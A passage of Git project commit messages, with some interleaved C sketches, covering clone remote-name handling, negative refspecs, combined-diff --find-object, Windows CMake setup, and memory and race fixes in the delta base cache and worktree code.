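const char *resolve_remote_name(const char *cli_origin,
				const char *config_value)
{
	const char *name = "origin";	/* 5. built-in default */

	if (config_value)
		name = config_value;	/* 2-4. any config source */
	if (cli_origin)
		name = cli_origin;	/* 1. -o/--origin wins */
	assert(name[0] != '\0');
	return name;
}
```

Applying the sources from lowest to highest priority means each later source can simply overwrite the earlier one, with no extra bookkeeping about where the current value came from.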
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Helped-by: Derrick Stolee <stolee@gmail.com>
Helped-by: Andrei Rybak <rybak.a.v@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future patch, the name of the remote created by `git clone` may
come from multiple sources. To avoid confusion, convert most uses of
option_origin to remote_name, leaving option_origin to exclusively
represent the -o/--origin option.
Helped-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Providing a bad origin name to `git clone` currently reports an
'invalid refspec' error instead of a more explicit message explaining
that the `--origin` option was malformed. This behavior dates back to
8434c2f1 (Build in clone, 2008-04-27). Reintroduce
validation for the provided `--origin` option, but notably _don't_
include a multi-level check (e.g. "foo/bar") that was present in the
original `git-clone.sh`. `git remote` allows multi-level remote names
since at least 46220ca100 (remote.c: Fix overtight refspec validation,
2008-03-20), so that appears to be the desired behavior.
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Derrick Stolee <stolee@gmail.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a future patch, extract from remote.c a function that
validates possible remote names so that its rules can be used
consistently in other places.
Helped-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a future patch that moves `builtin/remote.c`'s
remote-name validation, ensure `git remote add` and `git remote rename`
report errors when the new name isn't valid.
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Parsing command-line options before reading from config required careful
handling to ensure CLI options were treated with higher priority. Read
config first to let parsed CLI naively overwrite matching config values.
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both fetch and push support pattern refspecs which allow fetching or
pushing references that match a specific pattern. Because these patterns
are globs, they have somewhat limited ability to express more complex
situations.
For example, suppose you wish to fetch all branches from a remote except
for a specific one. To allow this, you must set up a set of refspecs
which match only the branches you want. Because refspecs are either
explicit name matches, or simple globs, many patterns cannot be
expressed.
Add support for a new type of refspec, referred to as "negative"
refspecs. These are prefixed with a '^' and mean "exclude any ref
matching this refspec". They can only have one "side" which always
refers to the source. During a fetch, this refers to the name of the ref
on the remote. During a push, this refers to the name of the ref on the
local side.
With negative refspecs, users can express more complex patterns. For
example:
git fetch origin refs/heads/*:refs/remotes/origin/* ^refs/heads/dontwant
will fetch all branches on origin into remotes/origin, but will exclude
fetching the branch named dontwant.
Refspecs today are commutative, meaning that order doesn't expressly
matter. Rather than forcing an implied order, negative refspecs will
always be applied last. That is, in order to match, a ref must match at
least one positive refspec, and match none of the negative refspecs.
This is similar to how negative pathspecs work.
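The matching rule can be sketched in C as below. The names match_pattern() and ref_is_selected() are hypothetical, the specs are reduced to their source side only (no ":<dst>" part), and the single-'*' matcher is a stand-in for Git's own refspec matching.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Match a ref against a pattern containing at most one '*'. */
static int match_pattern(const char *pattern, const char *ref)
{
	const char *star = strchr(pattern, '*');
	size_t prefix_len, suffix_len, ref_len;

	if (!star)
		return strcmp(pattern, ref) == 0;
	prefix_len = (size_t)(star - pattern);
	suffix_len = strlen(star + 1);
	ref_len = strlen(ref);
	return ref_len >= prefix_len + suffix_len &&
	       !strncmp(pattern, ref, prefix_len) &&
	       !strcmp(star + 1, ref + ref_len - suffix_len);
}

/*
 * A ref is selected when it matches at least one positive spec and
 * none of the negative ('^'-prefixed) specs, in any order.
 */
int ref_is_selected(const char *ref, const char *const *specs, size_t nr)
{
	int matched = 0;
	size_t i;

	assert(ref != NULL && (specs != NULL || nr == 0));
	for (i = 0; i < nr; i++) {
		if (specs[i][0] == '^') {
			if (match_pattern(specs[i] + 1, ref))
				return 0;	/* any negative match excludes */
		} else if (match_pattern(specs[i], ref)) {
			matched = 1;
		}
	}
	return matched;
}
```

Because a negative match rejects the ref outright, the result does not depend on where the negative spec appears in the list.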
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When doing combined diffs, we have two possible code paths:
- a slower one which independently diffs against each parent, applies
any filters, and then intersects the resulting paths
- a faster one which walks all trees simultaneously
When the diff options specify that we must do certain filters, like
pickaxe, then we always use the slow path, since the pickaxe code only
knows how to handle filepairs, not the n-parent entries generated for
combined diffs.
But there are two problems with the slow path:
1. It's slow. Running:
git rev-list HEAD | git diff-tree --stdin -r -c
in git.git takes ~3s on my machine. But adding "--find-object" to
that increases it to ~6s, even though find-object itself should
incur only a few extra oid comparisons. On linux.git, it's even
worse: 35s versus 215s.
2. It doesn't catch all cases where a particular path is interesting.
Consider a merge with parent blobs X and Y for a particular path,
and end result Z. That should be interesting according to "-c",
because the result doesn't match either parent. And it should be
interesting even with "--find-object=X", because "X" went away in
the merge.
But because we perform each pairwise diff independently, this
confuses the intersection code. The change from X to Z is still
interesting according to --find-object. But in the other parent we
went from Y to Z, so the diff appears empty! That causes the
intersection code to think that parent didn't change the path, and
thus it's not interesting for "-c".
This patch fixes both by implementing --find-object for the multitree
code. It's a bit unfortunate that we have to duplicate some logic from
diffcore-pickaxe, but this is the best we can do for now. In an ideal
world, all of the diffcore code would stop thinking about filepairs and
start thinking about n-parent sets, and we could use the multitree walk
with all of it.
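The X/Y/Z case can be modelled with a small C sketch. This is a toy model under stated assumptions, not the code from this patch: blob ids are plain strings, and both function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model: blob ids are plain strings such as "X", "Y" and "Z". */

/* Slow path: filter each parent's pairwise diff, then intersect. */
int pairwise_keeps_path(const char *const *parents, size_t nr,
			const char *result, const char *target)
{
	size_t i;

	assert(parents != NULL && result != NULL && target != NULL);
	for (i = 0; i < nr; i++) {
		int changed = strcmp(parents[i], result) != 0;
		int touches = !strcmp(parents[i], target) ||
			      !strcmp(result, target);

		if (!changed || !touches)
			return 0;	/* absent from one diff: dropped */
	}
	return nr > 0;
}

/* Multitree model: look at the result and all parents together. */
int multitree_keeps_path(const char *const *parents, size_t nr,
			 const char *result, const char *target)
{
	int touches;
	size_t i;

	assert(parents != NULL && result != NULL && target != NULL);
	touches = !strcmp(result, target);
	for (i = 0; i < nr; i++) {
		if (!strcmp(parents[i], result))
			return 0;	/* result matches a parent */
		if (!strcmp(parents[i], target))
			touches = 1;
	}
	return touches;
}
```

With parents X and Y, result Z and target X, the pairwise model drops the path because the Y-to-Z diff does not involve X, while the multitree model keeps it.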
Until then, there are some leftover warts:
- other pickaxe operations, like -S or -G, still suffer from both
problems. These would be hard to adapt because they rely on having
a diff_filespec() for each path to look at content. And we'd need to
define what an n-way "change" means in each case (probably easy for
"-S", which can compare counts, but not so clear for -G, which is
about grepping diffs).
- other options besides --find-object may cause us to use the slow
pairwise path, in which case we'll go back to producing a different
(wrong) answer for the X/Y/Z case above.
We may be able to hack around these, but I think the ultimate solution
will be a larger rewrite of the diffcore code. For now, this patch
improves one specific case but leaves the rest.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The OFFSETOF_VAR(var, member) macro is implemented in terms of
offsetof(typeof(*var), member) with compilers that know typeof(),
but its fallback implementation compares &(var->member) and (var) and
counts the distance in bytes, i.e.
((uintptr_t)&(var)->member - (uintptr_t)(var))
MSVC's runtime check, when fed an uninitialized 'var', flags this as
a use of an uninitialized variable (and that is legit---uninitialized
contents of 'var' is subtracted) in a debug build.
After auditing all 6 uses of OFFSETOF_VAR(), 1 of them does feed a
potentially uninitialized 'var' to the macro in the beginning of the
for() loop:
#define hashmap_for_each_entry(map, iter, var, member) \
for (var = hashmap_iter_first_entry_offset(map, iter, \
OFFSETOF_VAR(var, member)); \
var; \
var = hashmap_iter_next_entry_offset(iter, \
OFFSETOF_VAR(var, member)))
We can work around this by making sure that var has _some_ value
when OFFSETOF_VAR() is called. Strictly speaking, it invites
undefined behaviour to use NULL here if we end up with pointer
comparison, but MSVC runtime seems to be happy with it, and most
other systems have typeof() and don't even need pointer comparison
fallback code.
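A small sketch of the fallback form shows why 'var' needs a definite value: the macro reads 'var' itself. The struct demo_entry and the function demo_tag_offset() are made up for illustration, and the sketch points 'var' at a real object rather than NULL so that it stays within defined behaviour.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fallback form as quoted in the text above. */
#define OFFSETOF_VAR(ptr, member) \
	((uintptr_t)&(ptr)->member - (uintptr_t)(ptr))

struct demo_entry {	/* hypothetical struct, for illustration only */
	int id;
	double weight;
	char tag;
};

size_t demo_tag_offset(void)
{
	struct demo_entry e = { 0 };
	struct demo_entry *var = &e;	/* var holds a definite value */
	size_t off = OFFSETOF_VAR(var, tag);

	/* The byte distance agrees with the standard offsetof(). */
	assert(off == offsetof(struct demo_entry, tag));
	return off;
}
```

Both operands of the subtraction are derived from the value of 'var', so an uninitialized 'var' feeds indeterminate bits into the computation even though the difference would be the same for any valid pointer.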
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is a lot more convenient to use than having to specify the
configuration in CMake manually (does not matter whether using the
command-line or CMake's GUI).
While at it, recommend using `contrib/buildsystems/out/` as build
directory also in the part that talks about running CMake manually.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The idea of having CMake support in Git's source tree is to enable
contributors on Windows to start contributing with little effort. To
that end, we just added some sensible defaults that will let users open
the worktree in Visual Studio and start building.
This expects the dependencies (such as zlib) to be available already,
though. If they are not available, we expect the user to run
`compat/vcbuild/vcpkg_install.bat`.
Rather than requiring this step to be manual, detect the situation and
run it as part of the CMake configuration step.
Note that this obviously only applies to the scenario when we want to
compile in Visual Studio (i.e. with MS Visual C), not with GCC.
Therefore, we guard this new code block behind the `MSVC` conditional.
This concludes our journey to make it as effortless as possible to start
developing Git in Visual Studio: all the developer needs to do is to
clone Git's repository, open the worktree via `File>Open>Folder...` and
wait for CMake to finish configuring.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have some custom handling regarding the link options, which are
specific to each compiler.
Therefore: let's not just continue without setting the link options if
configuring for a currently unhandled compiler, but error out.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Contrary to Unix-ish platforms, the dependencies' shared libraries are
not usually found in one central place. In our case, since we use
`vcpkg`, they are to be found inside the `compat/vcbuild/vcpkg/` tree.
Let's make sure that they are in the search path when running the tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, the build directory will be called something like
`contrib/buildsystems/out/build/x64-Debug (default)` (note the space and
the parentheses). We need to make sure that such a path is quoted
properly when editing the assignment of the `GIT_BUILD_DIR` variable.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are already relying on `vcpkg` to manage our dependencies, including
`libiconv`. Let's also use the `msgfmt.exe` from there.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't use the untracked_cache_dir parameter that is passed in, but
instead look at the untracked_cache_dir inside the cached_dir struct we
are passed. It's been this way since the introduction of
treat_path_fast() in 91a2288b5f (untracked cache: record/validate dir
mtime and reuse cached output, 2015-03-08).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The append_signoff() function takes an "ignore_footer"
argument, which specifies a number of bytes at the end of
the message buffer which should not be considered (they
cannot contain trailers, and the trailer is spliced in
before them).
But to find the existing trailers, it calls into
has_conforming_trailer(). That function takes an
ignore_footer parameter, but since 967dfd4d56 (sequencer:
use trailer's trailer layout, 2016-11-02) the parameter is
completely ignored.
The trailer interface we're using takes a single string,
with no option to tell it to use part of the string.
However, since we have a mutable strbuf, we can work around
this by simply overwriting (and later restoring) the
boundary with a NUL.
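The overwrite-and-restore trick can be sketched in C as follows. The helper with_footer_hidden() and its callback parameter are hypothetical; they stand in for a mutable buffer and a parser that only accepts a whole NUL-terminated string.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: hide the last `ignore_footer` bytes of `buf`
 * from a consumer that takes a NUL-terminated string, by temporarily
 * writing a NUL at the boundary and restoring the byte afterwards.
 */
size_t with_footer_hidden(char *buf, size_t ignore_footer,
			  size_t (*consume)(const char *))
{
	size_t len, cut, ret;
	char saved;

	assert(buf != NULL && consume != NULL);
	len = strlen(buf);
	assert(ignore_footer <= len);
	cut = len - ignore_footer;

	saved = buf[cut];	/* the existing NUL when ignore_footer is 0 */
	buf[cut] = '\0';
	ret = consume(buf);	/* sees only the first `cut` bytes */
	buf[cut] = saved;
	return ret;
}
```

Passing strlen as the consumer shows the effect: it reports only the visible part, and the buffer is unchanged once the call returns.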
I'm not sure if this can actually trigger a bug in practice.
It's easy to get a non-zero ignore_footer by doing something
like this:
git commit -F - --cleanup=verbatim <<-EOF
subject
body
Signed-off-by: me
# this looks like a comment, but is actually in the
# message! That makes the earlier s-o-b fake.
EOF
git commit --amend -s
There git-commit calls ignore_non_trailer() to count up the
"#" cruft, which becomes the ignore_footer header. But it
works even without this patch! That's because the trailer
code _also_ calls ignore_non_trailer() and skips the cruft,
too. So it happens to work because the only callers with a
non-zero ignore_footer are using the exact same function
that the trailer parser uses internally.
And that seems true for all of the current callers, but
there's nothing guaranteeing it. We're better off only
feeding the correct buffer to the trailer code in the first
place.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We complain if "test-tool advise" is not given an argument, but we
quietly ignore any additional arguments it receives. Let's instead check
that we got the expected number. As a bonus, this silences
-Wunused-parameter, which notes that we don't ever look at argc.
While we're here, we can also fix the indentation in the conditional.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The sparse-checkout passes along argv and argc to its sub-command helper
functions. Many of these sub-commands do not yet take any command-line
options, and ignore those parameters.
Let's instead add empty option lists and make sure we call
parse_options(). That will give a useful error message for something
like:
git sparse-checkout list --nonsense
which currently just silently ignores the unknown option.
As a bonus, it also silences some -Wunused-parameter warnings.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we switched to using an external git-commit call in b0a3186140
(sequencer: simplify root commit creation, 2019-08-19), this function
didn't need to care about the repository object any more.
Arguably we could be passing along the repository path to the external
git-commit by using "--git-dir=r->path" here. But for the most part the
sequencer code relies on sub-process finding the same repository we're
already in (using the same environment variables or discovery process we
did). But we don't have a convenient interface for doing so, and there's
no indication that we need to. Let's just drop the unused parameter for
now.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We stopped using the "repo" argument in 8e4c8af058 (push: disallow --all
and refspecs when remote.<name>.mirror is set, 2019-09-02), which moved
the pushremote handling to its caller.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the spirit of 517fe807d6 (assert NOARG/NONEG behavior of
parse-options callbacks, 2018-11-05), let's cover some parse-options
callbacks which expect to be used with PARSE_OPT_NONEG but don't
explicitly assert that this is the case. These callbacks are all used
correctly in the current code, but this will help document their
expectations and future-proof the code.
As a bonus, it also silences -Wunused-parameter (these were added since
the initial sweep of 517fe807d6, and we can't yet turn on
-Wunused-parameter to remind people because it has too many existing
false positives).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use OPT_CALLBACK_F() to call the option_parse_type() callback,
passing it the address of "cmdmode" as the value to write to. But the
callback doesn't look at opt->value at all, and instead writes to a
global variable.
This works out because that's the same global variable we happen to pass
in, but it's rather confusing. Let's use the passed-in value instead.
We'll also make "cmdmode" a local variable of the main function,
ensuring we can't make the same mistake again.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many functions take an argv/argc pair, but never actually look at argc.
This makes it useless at best (we use the NULL sentinel in argv to find
the end of the array), and misleading at worst (what happens if the argc
count does not match the argv NULL?).
In each of these instances, the argv NULL does match the argc count, so
there are no bugs here. But let's tighten the interfaces to make it
harder to get wrong (and to reduce some -Wunused-parameter complaints).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The crlf_action parameter hasn't been used since a0ad53c181 (convert:
Correct NNO tests and missing `LF will be replaced by CRLF`,
2016-08-13), where that part of the function was hoisted out to a
separate will_convert_lf_to_crlf() helper. Let's drop the useless
parameter.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Earlier we taught "git pull" to warn when the user does not say
whether the histories need to be merged, rebased, or only
fast-forwarded, but the warning triggered even for those who have
set the pull.ff configuration variable.
* ah/pull:
pull: don't warn if pull.ff has been set
"git range-diff" showed incorrect diffstat, which has been
corrected.
* tg/range-diff-same-file-fix:
diff: fix modified lines stats with --stat and --numstat
Adjust sample hooks for hash algorithm other than SHA-1.
* dl/zero-oid-in-hooks:
hooks--update.sample: use hash-agnostic zero OID
hooks--pre-push.sample: use hash-agnostic zero OID
hooks--pre-push.sample: modernize script
"git clone" that clones from SHA-1 repository, while
GIT_DEFAULT_HASH set to use SHA-256 already, resulted in an
unusable repository that half-claims to be SHA-256 repository
with SHA-1 objects and refs. This has been corrected.
* bc/clone-with-git-default-hash-fix:
builtin/clone: avoid failure with GIT_DEFAULT_HASH
"git commit-graph write" learned to limit the number of bloom
filters that are computed from scratch with the --max-new-filters
option.
* tb/bloom-improvements:
commit-graph: introduce 'commitGraph.maxNewFilters'
builtin/commit-graph.c: introduce '--max-new-filters=<n>'
commit-graph: rename 'split_commit_graph_opts'
bloom: encode out-of-bounds filters as non-empty
bloom/diff: properly short-circuit on max_changes
bloom: use provided 'struct bloom_filter_settings'
bloom: split 'get_bloom_filter()' in two
commit-graph.c: store maximum changed paths
commit-graph: respect 'commitGraph.readChangedPaths'
t/helper/test-read-graph.c: prepare repo settings
commit-graph: pass a 'struct repository *' in more places
t4216: use an '&&'-chain
commit-graph: introduce 'get_bloom_filter_settings()'
More FAQ entries.
* bc/faq-misc:
docs: explain how to deal with files that are always modified
docs: explain why reverts are not always applied on merge
docs: explain why squash merges are broken with long-running branches
Some combinations of command-line options to `git clone` are invalid,
but there were previously no tests ensuring those combinations reported
errors. Similarly, `git clone --template` didn't appear to have any
tests.
Helped-by: Jeff King <peff@peff.net>
Helped-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Get rid of 'dense' argument that is redundant for every function that has
'struct rev_info *rev' argument as well, as the value of 'dense' passed is
always taken from 'rev->dense_combined_merges' field.
The only place where this was not the case is in 'submodule.c' where
'diff_tree_combined_merge()' was called with '1' for 'dense' argument. However,
at that call the 'revs' instance used is local to the function, and we now just
set 'revs->dense_combined_merges' to 1 in this local instance.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When add_delta_base_cache() is called with a base that is already in the
cache, no operation is performed. But the check is done after allocating
space for a new entry, so we end up leaking memory on the early return.
In addition, the caller never free()'s the base as it expects the
function to take ownership of it. But the base is not released when we
skip insertion, so it also gets leaked. To fix these problems, move the
allocation of a new entry further down in add_delta_base_cache(), and
free() the base on early return.
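The ownership rule can be illustrated with a toy cache in C. Everything here (toy_cache, toy_cache_add(), the fixed slot count) is a made-up stand-in for the real delta base cache; the point is only the ordering of the check, the allocation and the free().

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define TOY_CACHE_SLOTS 4

struct toy_entry {
	int key;
	void *base;
};

static struct toy_entry *toy_cache[TOY_CACHE_SLOTS];

/*
 * Takes ownership of `base` in every case. Returns 1 if inserted,
 * 0 if the key was already cached or the entry could not be stored.
 */
int toy_cache_add(int key, void *base)
{
	struct toy_entry *ent;
	size_t i, free_slot = TOY_CACHE_SLOTS;

	assert(base != NULL);
	for (i = 0; i < TOY_CACHE_SLOTS; i++) {
		if (!toy_cache[i]) {
			if (free_slot == TOY_CACHE_SLOTS)
				free_slot = i;
		} else if (toy_cache[i]->key == key) {
			free(base);	/* we own it, so release it */
			return 0;
		}
	}
	if (free_slot == TOY_CACHE_SLOTS) {
		free(base);
		return 0;
	}
	/* Allocate only once we know the entry will be kept. */
	ent = malloc(sizeof(*ent));
	if (!ent) {
		free(base);
		return 0;
	}
	ent->key = key;
	ent->base = base;
	toy_cache[free_slot] = ent;
	return 1;
}
```

Since the duplicate check runs before malloc(), the early return has no half-built entry to clean up, and the caller can hand over `base` without tracking whether the insertion happened.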
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The third phase of unpack_entry() performs the following sequence in a
loop, until all the deltas enumerated in phase one are applied and the
entry is fully reconstructed:
1. Add the current base entry to the delta base cache
2. Unpack the next delta
3. Patch the unpacked delta on top of the base
When the optional object reading lock is enabled, the above steps will
be performed while holding the lock. However, step 2. momentarily
releases it so that inflation can be performed in parallel for increased
performance. Because the `base` buffer inserted in the cache at 1. is
not duplicated, another thread can potentially free() it while the lock
is released at 2. (e.g. when there is no space left in the cache to
insert another entry). In this case, the later attempt to dereference
`base` at 3. will cause a segmentation fault. This problem was observed
during a multithreaded git-grep execution on a repository with large
objects.
To fix the race condition (and later segmentation fault), let's reorder
the aforementioned steps so that `base` is only added to the cache at
the end. This will prevent the buffer from being released by another
thread while it is still in use. An alternative solution which would not
require the reordering would be to duplicate `base` before inserting it
in the cache. However, as Phil Hord mentioned, memcpy()'ing large bases
can negatively affect performance: in his experiments, this alternative
approach slowed git-grep down by 10% to 20%.
Reported-by: Phil Hord <phil.hord@gmail.com>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a fetch with the --filter argument is made, the configured default
filter is set even if one already exists. This change was made in
5e46139376 ("builtin/fetch: remove unique promisor remote limitation",
2019-06-25) - in particular, changing from:
* If this is the FIRST partial-fetch request, we enable partial
* on this repo and remember the given filter-spec as the default
* for subsequent fetches to this remote.
to:
* If this is a partial-fetch request, we enable partial on
* this repo if not already enabled and remember the given
* filter-spec as the default for subsequent fetches to this
* remote.
(The given filter-spec is "remembered" even if there is already an
existing one.)
This is problematic whenever a lazy fetch is made, because lazy fetches
are made using "git fetch --filter=blob:none", but this will also happen
if the user invokes "git fetch --filter=<filter>" manually. Therefore,
restore the behavior prior to 5e46139376, which writes a filter-spec
only if the current fetch request is the first partial-fetch one (for
that remote).
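The restored rule can be sketched as follows. This is only a Python model, not the C code in builtin/fetch.c: the function name `remember_filter` and the use of a plain dict as a stand-in for the repository config are assumptions made for illustration.

```python
def remember_filter(config, remote, filter_spec):
    """Record filter_spec as the remote's default only if none is set yet.

    `config` is a plain dict standing in for the repository config
    (an assumption for this sketch).
    """
    key = f"remote.{remote}.partialclonefilter"
    if key not in config:
        # First partial-fetch request for this remote: remember the spec.
        config[key] = filter_spec
    # Later requests, including lazy fetches, leave the stored spec alone.
    return config[key]
```

With this rule, a lazy fetch that passes "blob:none" after the user configured "tree:0" leaves "tree:0" in place.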
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The text tries to say the code accepts many variations that look remotely
like scissors and perforation marks, but gives too little detail for users
to decide what is and what is not taken as a scissors line for themselves.
Instead of describing the heuristics more, just spell out what will always
be accepted, namely "-- >8 --", as it would not help users to give them
more choices and flexibility and be "creative" in their scissors line.
Signed-off-by: Evan Gates <evan.gates@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On Windows, we use the `vcpkg` project to manage the dependencies, via
`compat/vcbuild/`. Let's make sure that these dependencies are found by
default.
This is needed because we are about to recommend loading the Git
worktree as a folder into Visual Studio, relying on the automatic CMake
support (which would make it relatively cumbersome to adjust the search
path used by CMake manually).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, Git for Windows does not install its `sh.exe` into the
`PATH`. However, our current `CMakeLists.txt` expects to find a shell
interpreter in the `PATH`.
So let's fall back to looking in the default location where Git for
Windows _does_ install a relatively convenient `sh.exe`:
`C:\Program Files\Git\bin\sh.exe`
Helped-by: Øystein Walle <oystwa@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
That should be a ":", not a second "=". While at it, refer to the
placeholder "<n>" as "<n>", not "n" (see, e.g., the entry just before
this one).
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We document how `merge.suppressDest` can be used to omit " into <branch
name>" from the title of the merge message. It is true that we omit the
space character before "into", but that lone double quote character
risks ending up on the wrong side of a line break, looking a bit out of
place. This currently happens with, e.g., 80-character terminals.
Drop that leading quoted space. The result should be just as clear about
how this option affects the formatted message.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Instead of checking for "refs/heads/" using `starts_with()`, then
skipping past "refs/heads/" using `strlen()`, just use `skip_prefix()`.
In `is_worktree_being_rebased()`, we can adjust the indentation while
we're here and lose a pair of parentheses which isn't needed and which
might even make the reader wonder what they're missing and why that
grouping is there.
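As a rough illustration of why one call is nicer than two, here is a Python model of the idea. It is not Git's C helper, which returns an int and stores the remainder through an out pointer; this version returns the remainder directly, or None when the prefix is absent.

```python
def skip_prefix(s, prefix):
    """Return the part of s after prefix, or None if s lacks the prefix."""
    if s.startswith(prefix):
        # Test and skip in one place, so the prefix is spelled only once.
        return s[len(prefix):]
    return None
```

A caller can then write `branch = skip_prefix(ref, "refs/heads/")` and test `branch is not None`, instead of repeating the prefix for the check and again for the length.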
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As the commit message of 04a3dfb8b5 ("worktree.c: check whether branch
is bisected in another worktree", 2016-04-22) indicates, the function
`is_worktree_being_bisected()` is based on the older function
`is_worktree_being_rebased()`. This heritage can also be seen in the
name of the variable where we store our return value: It was never
adapted while copy-editing and remains as `found_rebase`.
Rename the variable to make clear that we're looking for a bisect(ion),
nothing else.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The comment above `add_head_info()` mentions "head_sha1", but it was
renamed to "head_oid" in 0f05154c70 ("worktree: convert struct worktree
to object_id", 2017-10-15). Update the comment.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have `strbuf_worktree_ref()`, which works on a strbuf, and a wrapper
for it, `worktree_ref()` which returns a string. We even make this
wrapper available through worktree.h. But it only has a single caller,
sitting right next to it in worktree.c.
Just inline the wrapper into its only caller. This means the caller can
quite naturally reuse a single strbuf. We currently achieve something
similar by having a static strbuf in the wrapper.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we have a `struct wt_status_state`, we manually free its `branch`,
`onto` and `detached_from`, or sometimes just one or two of them.
Provide a function `wt_status_state_free_buffers()` which does the
freeing.
The callers are still aware of these fields, e.g., they check whether
`branch` was populated or not. But this way, they don't need to know
about *all* of them, and if `struct wt_status_state` gets more fields,
they will not need to learn to free them.
Users of `struct wt_status` (which contains a `wt_status_state`) already
have `wt_status_collect_free_buffers()` (corresponding to
`wt_status_collect()`) which we can also teach to use this new helper.
Finally, note that we're currently leaving dangling pointers behind.
Some callers work on a stack-allocated struct, where this is obviously
ok. But for the users of `run_status()` in builtin/commit.c, there are
ample opportunities for someone to mistakenly use those dangling
pointers. We seem to be ok for now, but it's a use-after-free waiting to
happen. Let's leave NULL-pointers behind instead.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We pass around a `FILE *` in the `struct wt_status` and almost always
print to it. But in a few places, we write to `stdout` instead, either
explicitly through `fprintf(stdout, ...)` or implicitly with
`printf(...)` (and a few `putchar(...)`).
Always be explicit about writing to `s->fp`. To the best of my
understanding, this never mattered in practice because these spots are
involved in various forms of `git status` which always end up at
standard output anyway. When we do write to another file, it's because
we're creating a commit message template, and these code paths aren't
involved.
But let's be consistent to help future readers and avoid future bugs.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`abbrev_sha1_in_line()` uses a `struct object_id oid` and should be
